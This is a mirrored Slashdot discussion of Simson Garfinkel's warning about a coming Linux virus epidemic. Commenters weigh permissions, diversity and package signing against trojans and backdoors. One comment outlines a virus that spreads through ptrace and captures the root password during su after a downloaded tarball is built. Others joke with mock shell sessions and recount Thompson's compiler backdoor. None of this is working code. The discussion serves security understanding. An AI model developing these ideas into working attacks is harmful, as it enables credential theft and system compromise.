Slashdot Mirror
Garfinkel Warns Of Linux Virus "Epidemic"
An anonymous coward says: "Simson Garfinkel has an opinion piece at SecurityFocus called " The Coming Linux Plague." He argues that Linux is no less susceptible to viruses than Windows, and that an epidemic is inevitable.
" I'm sure most of us have read his books. What do you think of this commentary?
What carp!
Stop and think for a moment. To produce a binary Linux virus (as opposed to a script virus), you have to have a virus capable of handling a.out and elf binaries. It has to support Linux 1.x.y and Linux 2.x.y kernels, It has to support libc5, glibc 2.0 and glibc 2.1. It has to support ix86, IA64, ARM, Alpha, Sparc, Sparc64, m64k, ppc, S/360 and any other architecture Linux supports.
Why? Because if it can't run, it won't spread. And because you can't know what the virus will run on ahead of time, it would have to run on EVERYTHING to survive.
Then, of course, if it's doing low-level appends, it's got to support ext2fs, ext3fs, reiserfs, xfs, jfs, ufs, umsdos, and any other filing system that Linux could be run off of.
Script viruses don't have it any easier. You've no way of knowing if bash 1, bash 2, csh, tcsh, ksh, zsh, perl, tcl/tk, python, or any other given shell is present, never mind used. Nor can you rely on a given version being present. Perl and Tcl are extremely version-sensitive, making viruses in these languages either dependent on there being specific versions installed, or having support for many many versions.
Then, there's always the problems produced by the International Kernel Patch (which can encrypt partitions for you), Tripwire and its many clones, the various Linux Kernel hardening projects, etc. If a virus can survive all of that, it almost deserves to conquer the world.
Windows viruses have proliferated because there is a high degree of uniformity at the low-levels. This just doesn't exist in Linux (thank God!) and probably never could, at this point.
Any claim that someone could =write= a Linux virus which is not so specific as to be useless is plain stupid. Such an animal does not and CAN NOT exist. Linux is far too diverse, now.
Some people may have heard of the concept of "biodiversity", whereby living organisms protect themselves from real diseases or attacks by being as different and diverse as possible. Linux has gained that same protection, now, and is immune to all-encompassing attacks. Only specific attacks are of any use, and the more diverse Linux is, the more specific those attacks need to be. It could reach the point where they can only run on one machine. OOOOH! SCARY!
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Think about it... I'm some bored script kiddie who wants my 15 minutes of fame. Am I going to try to write a virus to infect hundreds of systems, or hundreds of thousands?
The point the author was trying to make is that the landscape is changing. As we are celebrating all the new people who are starting to use Linux, and all the easy-to-install distributions, the "average user" is changing. You no longer need a degree in CS to simply use a Liux system. Just as there are plenty of unsophisticated Windows users, there will be unsophisticated Linux users. Add to this the hordes of home users signing up every day for always-on fat pipe Internet connections. There are ways to worm your way into a Linux system, especially if the "administrator" is clueless about security. (Read: buffer over-run bugs, SMTP vulnerabilities, etc...)
I'm not about to plunk down $50 for a questionable Linux "security" product, but I do try to keep an eye on what's happening to my system. More important, distributions like RedHat and ilk need to carefully consider what their default configurations look like, knowing that setting up maximum security as the base configuration is a wise thing to do. If users need more flexibility, then let them learn about what the tradeoffs are, so they can open up only the doors they need. Support organizations need to make security a top priority, making sure that everyone -- even the clueless newby -- can keep their systems up to date with the latest security patches.
Security -- no matter what your OS is -- doesn't come for free.
Your Servant, B. Baggins
Viruses in various forms will propagate - there's loads of programmes which are vulnerable. But I don't see the huge problems with macro viruses occurring, there won't be any 'melissa'.
Trojans are already turning up here and there.
The trick is not to assume that something is more secure than windows, if you end up being copmplacent about security threats then you get what you deserve. You don't need to be paranoid either, and being paranoid doesn't mean spending money to support the anti-virus software industry. It just means making sure your code doesn't increase the risk to the whole.
So - if you spot a problem - then talk to the people who should deal with it.
Agreed - in fact, they already are
Download a binary that has a virus and run it as a normal user. OK - where from? ftp.debian.org? If I check the signature on the package I can be sure that it's as the package author sent it out, and I trust that package author not to have virii on his/her machine. I (as a programmer), wouldn't download binaries from an untrusted source (as I might get a trojan, which could do far more vicious things than a virus), but a newbie might and would get infected.
Lets say the user now compiles some code, that binary will be infected, the user puts the binary into a tar ball and shoves it onto their ftp site for distribution.. the virus spreads.
The type of people who download untrusted binaries don't tend to upload binaries either.
I still remain unconvinced about the abilities of virii to do real damage in the Linux environment (heck, binary virii haven't really caused problems in the Windows environment for years). However, you make some good points. Now that these vulnerabilities in the ELF file format and the Linux kernel have been pointed out, is there any work being done to close them?
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
A cursory browse at the example virii there (I didn't read all the papers, I admit), doesn't explain how a virus could gain root privileges (which it requires to propagate effectively), without being executed by root. Could you give me a pointer to a specific paper?
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
Your statement is overrated. Here is why:
In order for a virus to proliferate it needs to execute and infect executables. Even on "home" linux systems the executables are 99.999% not owned by the user. The user has no +w on them. So unless the virus attempts an exploit it will not be able to infect executables. There are few notable exemptions of course:
In order for computer viruses to proliferate you need to follow the same rules like in the life world. Namely you need the infection rate/death rate to exceed a certain threshold. All the cases above give you thresholds for good size local outbursts, but not for an epidemy. Which is not the case with Windows 9x, MacOS and their predecessors.
There are few notable examples when the above situation will drastically change. The most important one is:NO EXECUTABLE DOCUMENT FORMATS!!!". If MSWord will be ported or a similar abomination will become a predominant software product on Linux than there will be trouble. Because there will be "executable" user writable formats floating all over the place. Than the treshold for selfsustained infection will be exceeded.
Baker's Law: Misery no longer loves company. Nowadays it insists on it
http://www.sigsegv.cx/
Furthermore, the very nature of the Linux community poses a real obstacle to any viruses success. Whether or not people admit it, Microsoft plays a large contributing role in the success of its many viruses. Where Microsoft is unresponsive to most security problems, the linux community is very responsive. A published virus is likely to result, in a detailed plan of action against future attacks -- Microsoft simply isn't interested in this unless it can be proven that it'd hurt or help their bottom line significantly. Right now, to the best of my knowledge, most common windows exploits either come in shareware type programs (downloaded from some random site on the internet, or from a friend) or they're macroviruses (totally not an issue for linux yet). Linux, of course, is all about sharing software over the internet, as a result programs and code tend to recieve a considerable amount of scrutiny, even if only from 1% of the users (especially if primarly distributed as source). These users, can, and do, in turn, make a stink if something looks foul, making it unlikely to get archived on official sites and what not.
In conclusion, I don't have the time to analyze each and every difference between Linux and Windows; however, the differences between them will make Linux a relatively virus free platform. That being said, I do believe a few linux viruses will emerge pretty soon. Perhaps one or two will really take off, but the rest will fail. After that, the community and vendors at large will mend their ways, and stem the "reproduction" of viruses down to negligible levels.
File Viruses are still out there, of course, but not nearly as much as they used to be. A "pure" file virus is one that inserts itself into some other executable (or executables in general). These are less of a problem than they used to be because software is generally obtained off a CD-ROM or remote download site, and viruses can't touch these files (unless the software company or FTP hoster does something really dumb). Not much actual copying of executables off one machine onto another is done anymore, which is how these things spread. Anyone old enough to remember when we used to copy executables as a matter of course? Come on, 'fess up! Gee -- I can remember those quaint old programs which you didn't "install" as such because they consisted of one executable.
Macro Viruses are still big, though. And Microsoft's feature-driven focus will assure that this problem only gets worse. The big problem is that their software is so ubiquitous, making them a big easy target. And they keep doing really dumb stuff. Everything keeps getting more and more "active". They love that word, don't they? "Active" means "I'm a big gaping security hole just waiting to be exploited!" Linux won't have this problem until either Microsoft starts porting their stuff, or we get virus-compatible equivalents, or somehow the marketroids take over Linux software development and we throw all common sense out the window. I mean seriously, if someone actually wrote a mail reader for Linux that was so helpful that it says, "hey -- here's some new mail for you! Let me immediately display it in this window for you! And run this javascript thing in it for you!" -- would anyone use it? Any takers? Maybe if you run it under jail, right?
Trojans on the other hand, have come into their own. I still see the damn Happy '99 trojan wandering around now and then. The trojan that emails itself to everyone in your address book is one of the more popular forms. The great thing about trojans is that they rely on the human to be the weak link, not some software hole that would get closed up the moment it was discovered (or at least would if the software in question was open source). Human stupidity is here to stay! It's going to decrease, but only because people are now growing up with email and learn the tricks at a young age. It is, however, entirely feasible to write a trojan email attachment for Linux. It's not likely to be worth anyone's while, though, because of the small target market and high likelyhood that the user has at least half a clue with regards to this sort of thing. In any case, the user isn't likely to be running an email reader which makes activating the attachment a "double click" operation, and which address book are you going to read?
In summary, I don't see a big target market for viruses here. I think that worms are more likely to be the issue. That, and security holes that get exploited manually. These all come under the banner of cracking, rather than viruses (although worms are a sort of overlap point). Another possibility, as others have suggested, is back-door code being placed in a kernel module or something which explicitly creates an exploitable weakness. We'll see if the "bug-finding is parallelable" principle of Linux development also maps to the finding of deliberate security holes. I think accidental ones are likely to be the real problem, however.
-- The Famous Brett Watson
proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
Color me wrong, but why haven't the "half-dozen or so known Linux viruses" been detectable on the virometer yet? Sure, the boom is "coming", but why haven't the viruses that are already here had any success?
Geeky modern art T-shirts
sure.. the same guy who wrote these viruses has written scanners for each of them and is working on a "generic scanner" which detects such things as "entrypoint in the data segment", which he then defeats by overwriting the start of the original entrypoint with a jump to the data segment, etc. It's an arms race of sorts and the first step is to identify the possible techniques.
As for programmers not downloading binaries. There are times when you need a binary because there is no source. If you are downloading the binary from redhat.com, you may think that it is safe but without getting down with the instructions and checking out what it does you can't be certain. Good reverse engineering tools are still lacking and are desperately needed for security purposes. If it is possible for an ordinary user to get infected then it is not a giant leap to see a programmer getting infected and from there it is not difficult to see a distribution getting infected and a whole lot of users getting infected and thus a whole lot of programmers getting infected - especially with most of the linux community being programmers (of one sort or another).
How we know is more important than what we know.
rpm -ivh stoned.rpm
Missing dependencies:
glibc6
imlib
virus.so.4
But seriously, we scoff at this because most of us have never had a virus on a linux box. I know I never have, and I don't know anybody who has. But don't let this lull you into a false sense of security. Murphy's law has been proven true over and over and over again.
Linux is a very large and complex system. And as we all know, in any sufficiently complex system, there are bugs. If we get arrogant, those bugs will be exploited.
On a lighter note, the throroughly open nature of linux means that any virus written will be rendered useless in the next patch. But I don't think it's a problem we should ignore until systems are going down left and right.
Bad things to do around visuses:
- Never change
- always use the same software
- encourage monopolies
- don't build up an immune system (security, anti-viral programs)
Good things:- change often, adapt
- everyone use different software (diversity of distributions, kernels, desktop environments is a VERY good thing)
- security
- actively hunt down stuff in your system that changes unexpectedly
- stay away from those who seem to get infected a lot
You get the idea - M$'s world lives in a monoculture - just like a genetically engineered crop where everything is the same they are prey to that one viral mutation that can wipe out everyoneUsing basic powers of observation we can see:
1.This guy is a security consultant,one who makes money off computer users misery.
2.In order to market many products and/or
services a demand must be created if in fact it does not exist.
3.Software is created by people who hold
an interest in creating it,such as an out of work
security clown creating a virus,were it possible.
4.If you take off his diguise of glasses
and that ridiculous wig,you could see we are dealing with Elmer FUD.
*Repent!Quit Your Job!Slack Off!The World Ends Tomorrow and You May Die!
Never actually happened, eh? Taken from the Jargon Dictionary entry for Back Door:
Historically, back doors have often lurked in systems longer than anyone expected or planned, and a few have become widely known. Ken Thompson's 1983 Turing Award lecture to the ACM admitted the existence of a back door in early Unix versions that may have qualified as the most fiendishly clever security hack of all time. In this scheme, the C compiler contained code that would recognize when the `login' command was being recompiled and insert some code recognizing a password chosen by Thompson, giving him entry to the system whether or not an account had been created for him.
Normally such a back door could be removed by removing it from the source code for the compiler and recompiling the compiler. But to recompile the compiler, you have to use the compiler -- so Thompson also arranged that the compiler would recognize when it was compiling a version of itself, and insert into the recompiled compiler the code to insert into the recompiled `login' the code to allow Thompson entry -- and, of course, the code to recognize itself and do the whole thing again the next time around! And having done this once, he was then able to recompile the compiler from the original sources; the hack perpetuated itself invisibly, leaving the back door in place and active but with no trace in the sources.
I have known profesional programmers and hobbyists and in my view profesionals are MORE likely to write viruses than less likely.
Add to the mix that back doors in software are writen almost exclusivly by profesional programmers working on high end systems.
This is just my point of view but it seems to me that viruses are writen to attack an operating system and/or platform a person dislikes.
A profesional is more likely to have access to a system he dislikes than a hobbyist who would presumably only have the system he likes the most.
Unix admin have long had to use systems they disliked. In some cases a Unix admin prefers one *nix platform but gets stuck with a diffrent *nix platform. He wouldn't write viruses on the companys own system becouse that would get him fired but he would unleash it "into the wild" if posable.
In over 30 years.. with every motivation... and a lot of Unix hobbyists (In casse you prefer to belive viruses only come from hobbyists) a Unix virus is vertually unheard of.
To back up my clame that over the years Unix people are every bit as likely to make viruses as anyone else.. even more so... look at the shear number of trojen hourses writen for Unix. Far outnumbering those for Dos.
There are sevral reasons for that.. One is that Unix people are not worryed about trojens comming back to haunt them sence they run something diffrent at home. If they use computers at home at all.
(Think 30 years ago... the standard admin 1970 used CP/M at home if he had a computer at all.. the standard admin 2000 almost certenly has a server class system at home)
Note shortly after the first Linux virus was uncovered one of the big antivirus companys made a virus scanner for Linux. Then the virus was distoryed rendering the product useless.
There is some Linux antivirus software outthere. They don't do anything useful sence theres no viruses to stop. But some hobbyists are sereous tweeks.
Check out freshmeat and take a look at the antivirus software selection
I don't actually exist.
Of course, I can imagine worms which trick the users in, for example, executing a shell script which then mails messages using sendmail and ~/Mail, ~/.tinrc, /etc/passwd, etc. However, Unix provides nice means to control the in- and outgoing e-mail, and the root account would be in that case untouchable - I think.
But how about some evil-minded hacker (yes, you read it right: hacker, not cracker), who contributes for example to the kernel effort, and installs somewhere in an obscure driver a nice backdoor, and waits till a new major stable version of Linux comes out? Say, 2.4.0. Then all the people who download this kernel are vulnerable: the hacker waits till the 2.4 becomes popular, and then spreads the worm for the designed wormhole. Anyway, in that case he would be probably finished...
Well, I don't know. I'm not much of a hacker. But I think that getting a virus is in the case of Linux much less likely then in the case of Windows. And besides -- I haven't seen a virus for Windows ever since 1996 or something, so is there really a thing to worry about?
Regards,
January
...impossible to counterfeit, then the smarter half of the whole Linux community (who verify packages before installation) should be safe from viruses and trojans. Let's cross our fingers and hope the heavily used mirrors don't let their security down. Perhaps a review board of mirror site security should be establish. Even the most parnoid should be be able to sleep at night knowing that someone checked their mirror before they downloaded that last package.
On the issue of trojans, no one has seemed to have brought up the issue of trojans that could possibly make unannounced changes to source code as it is being compiled. Wouldn't that be harder to detect than a trojan as signatures can't protect uncompressed source? Imagine if your copy of Tripware, Necruss, GnuGP or perhaps even the kernel being comprised at compiliation time, meaning that your security could be comprimised without being able to realise it or detect it until it is too late? Now that's scary.
For the really paranoid, I recommend that you check out Kurt Seifried's extremely comprehensive Linux Administator's Security Guide (aka. LASG) at https://www.seifried.org/lasg/
If followed, it can put anyone's mind at ease.
-- "I can't tell the future, I just work there." -- The Doctor
That may be the case, but it's pretty damned tough to write an effective virus that will propagate with any efficiency on a Linux box.
I'll first discuss binary viruses, then macro virii, as they are seperate issues. All system-installed programs are owned by root (modulo some daemons and the like owned by administrative account), so to infect "ls" or "emacs" the virus would either have to use some exploit to gain root priviliges, or get itself installed suid root. Root exploits tend to get closed, pronto. Whilst newbies wouldn't check to see if a program installed itself suid root, experienced users would, and would let the world know if a paint program from www.reallycoolsoftware.com was installing itself suid root for no good reason. So propagation by infecting system software would be pretty damn difficult.
What could a virus then do to propagate itself without root priviliges? It could infect any program it had write permissions to - that is, any executable owned by the user, or set group or world writable. Newbies don't tend to have executables that they own, group-writable executables are rare (and not a great idea), and world-writable executables are extremely bad practice. Not much room for propagating there.
Even worse for the virus, binaries don't tend to get shared around much in the Linux community. Binaries tend to get distributed using CD-ROM's, distribution ftp sites, and possibly project ftp sites - none of the rampant floppy-swapping that made the viruses of the 80's and early 90's so prevalent. Nor do Linux email programs allow the blithe execution of binaries as many Windows mailers do.
Therefore, I consider it extremely unlikely that Linux binary virii will be able to propagate effectively.
Macro virii are a different proposition. File permissions are not such a defence here. However, these beasties rely on macro languages which were enabled by default, which allow arbitrary macro code to be executed on loading a document. If auto-executable macros are disabled by default (or banned outright), and macro languages restricted in their power to prevent them altering documents other than the one they are embedded in, the macro virus cannot propagate itself. Why can Linux applications do this readily, while Windows is more restricted? Simple - because the foreknowledge of what has happened in the Windows world is allowing Linux applications to be designed with macro-virus proofing in mind.
In summary, Linux is a damned hard target for virus writers. Next time Mr Garfinkel tries to drum up some business for himself, he might consider doing a little more research.
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
hehe.. more like:
./configure ./pointlessgadget
/usr/leet/leetgame
calvin:~$ wget http://somesite/pointlessgadget.tgz
calvin:~$ tar -xzvf pointlessgadget.tgz
calvin:~$ cd pointlessgadget
calvin:~$
calvin:~$ make
calvin:~$
"that was boring.. I'm gunna go shoot stuff"
calvin:~$ su
calvin:~$
pointlessgadget was infected with a virus.. when you ran the virus it infected every one of your running processes, including your shell. You su'd to root and it peaked at your psuedoterminal to snarf the root password. It then su'd to root and infected every running process on the machine. You then ran leetgame and the virus infected it. Next you'll probably run 'ls' and then it's all over.
Fiction? You can do it using ptrace. You can read about it here.
How we know is more important than what we know.
sticking your head in the sand is no way to defend against "a plague of viruses". Writing viruses is the only way to actively discover how it is possible to defend against them. A lot of linux viruses have already been written by very smart people and most have a scanner written for them too. Every virus developed introduces new information that can be added to a "generic scanner". Open and intelligent discussion of virus techniques is the solution to computer viruses.. on all platforms.. but the corporate antivirus companies dont want you to know that. They want you to subscribe to virus bulletin (a $5000/year subscription) and join the international computer antivirus standards body Caro (to join Caro you must be unaminously voted into Caro by current members. All current members are antivirus companies (or their founders) and have an interest in not voting you in - less competition). Dont let the anti-virus scam continue onto the linux platform. Do some research, address the problems. The most revealing linux virus research can be found at:
http://www.big.net.au/~silvio/
How we know is more important than what we know.
Of course, the biggest problem is that sometimes you are going to want to run as root, and you are probably going to want to install something while su'd to root. (It is wishful thinking to expect this not to happen. Someday there is going to be a really cool game for download in binary form that has a pop-up Window which says "enter root password" which may then turn out to be a trojan.)
My experience with virus checkers is that they don't work. I had a trojan eat an old Win95 machine of mine once, and the fact that it was running Norton's Anti-virus didn't help. However, Linux has more built in security against malicious actions than Win* systems, so I'm not expecting to see "a plague of Linux viruses."
All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
calvin:~$ wget http://somesite/happy99.tar.gz ./configure
calvin:~$ tar zxf happy9.tar.gz
calvin:~$ cd happy99
calvin:~$
calvin:~$ make
calvin:~$ su
calvin:~$ make install
calvin:~$ exit
calvin:~$ happy99
You must be root to run this program
calvin:~$ su
calvin:~$ happy99
(ops!)
This space left intentionally blank.
Most Linux users have no traditional Unix sysadmin, or user experience behind them. Traditionally the difficulty alone of installing Linux served as a sort of filter against immoral users engineering viruses. If you've ever administered a real system, or know of people who do, you're very unlikely to write a virus (unless you really have issues!).
I suspect that a rash of Linux viruses will come not from an economic depression (though that could certainley cause it too...think Russia), but from the midst of the masses migrating to Linux. While virtually everyone installing Linux, from "script kiddies" to Windows NT converts are scrupulous...you are bound to get a higher percentage of people who would be willing to write a virus.
Now granted, more of these people are incapable of programming such an entity compared with old Unix hands...but where there's a will there's a way. Somebody is bound to kludge together (or even finely tune, you never know) a series of downloaded hacks (hey! free source code!), and write a little code of their own...voila! Microwave virus. And it only takes one good virus to cause serious issues. Particularly because these things almost always encourage copy-cat crime. Odds are we'll see a rash of viruses any time now - whether the economy is strong or not.
Want to believe that even without a high "activiation energy" (ie the work and knowledge to install Linux) the pool of users will remain "clean"? One only has to look at Amateur Radio for a counter-example. For a long time proficieny with Morse Code was required to obtain a license. Now this may not seem like much of a barrier...but it was. When the "No-Code" license was introduced a wave of new radio operators began coming on the air. Now I don't dispute the overall effects of the new license, I think most agree they were good overall. No sense keeping a good thing to an "elite" group of people. But there was one strong negative effect - the introduction of a few, er, less than choice individuals.
Did such individuals exist in the "old world"? Well, yes. But they were a much lower percentage. Now radio had to deal with irritating interuptions and people refusing to follow protocol. A small loss, but many repeaters (stations that retransmit a weak signal) were unprepared and were abused as a result. Protection mechanisms were instituted, but it often took some months during which time a repeater was far less useful.
The long and short is that a company like Symantec (Norton) might find it worthwhile to have a Linux offering prepared. No use deploying it (well, not with scruples at least - I'm sure some morons will bite) until viruses exist. But when they do come, and I bet they will, that company will have a big lead. Other companies would probably take several months to a year to produce. By that time one could really corner the market. Linux users win, some lucky company wins (hopefuly whoever wrote the #*$&#*$&* virus shrivels up and dies). Yay!
I think few of us familiar with the sort of hacks we deploy on our systems, the sort of tricks a *nix system can perform...would deny the feasibility of writing a virus. To do so would be...naive. Now that I think of it, though I realize acting before the fact isn't the strength of the free software community, it would probably be good to begin working on a feasible free program soon. Hope we never would have to use it...but... It would be bad, bad, BAD for Linux systems to be crippled for 5 months, admins cowering in fear, because of a rash of viruses. That would take major PR recovery...and Linux really isn't that strong. Remember, the media likes biting those it adored mere months ago. Makes for good news.
-nullity-
I am nothing.